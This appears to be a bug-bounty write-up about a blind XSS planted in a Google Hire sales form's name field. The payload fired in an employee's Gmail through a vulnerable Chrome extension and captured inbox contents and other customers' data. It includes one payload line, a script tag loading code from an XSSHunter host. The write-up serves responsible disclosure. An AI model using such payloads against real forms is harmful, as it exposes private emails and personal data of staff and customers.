Blind XSS against a Googler


I found a blind XSS against a Googler because they were using a vulnerable Gmail Chrome extension.


When Google emailed all G Suite admins about its new feature, Hire with Google, I started to look into what the feature was and how it was designed. Initially, I could not look into this in depth because my G Suite account was not eligible for Hire. However, after a few months a salesperson from Google reached out to me, asking whether I wanted to demo or purchase the service.

I wanted to actually use/purchase the feature to see how it worked, so I went to and started to fill in the form. A few hours after submitting the form, something caught my attention. The salesperson had replied with a contract to sign attached. I assumed this meant that the original email I got was not an automated sales email. Knowing that a real human was reading my submission, I got excited, wondering "How are they receiving/reading my responses?". There were several ways this could have been done:

  • A custom CMS where the data is stored.
  • A third-party service.
  • Data sent directly to email.

To understand how this could work, I decided to try putting a blind XSS payload in my name field when submitting the form. My thought process was that if they had a custom CMS or used some third-party service, the payload would probably be rendered somewhere and I would have a blind XSS. For my payload, I used a simple XSSHunter payload:

<script src={{xsshunterwebsite}}></script>

A few hours later, when I went back to XSSHunter, it showed that the blind XSS had fired. To my surprise, it had executed on an origin:

The XSS report then gave me a lot of sensitive details:

  1. Email communications between the victim and their colleagues: the captured DOM HTML contained every email in their inbox at the moment the XSS executed.
  2. User information of other G Suite admins who had submitted their data to either demo the Hire service or buy it.
  3. And much more sensitive information.

After reporting

After reporting the issue, I discussed with Google's security team how the payload could have executed. It turned out to be due to an XSS in a Chrome extension for Gmail that the Googler was using: the extension rendered the submitted form data as HTML in the context of their mailbox, so a script tag in the name field ran with access to the whole page. In the end this was a cool bug, and they rewarded it pretty well.